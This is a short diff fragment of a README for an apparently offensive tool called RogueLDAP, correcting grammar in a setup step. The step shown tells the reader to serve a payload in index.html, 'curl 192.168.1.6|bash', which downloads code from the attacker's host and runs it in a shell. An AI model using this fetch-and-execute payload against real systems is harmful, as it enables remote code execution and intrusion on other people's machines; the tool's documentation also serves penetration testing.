twelvesec/RogueLDAP/README.md

 touch index.html
 ```

-Inside the ```index.html``` file put the following payload and change the IP address with the one that suit to the current environment
+Inside the ```index.html``` file put the following payload and change the IP address to the one that suits to the current environment

 ```
 curl 192.168.1.6|bash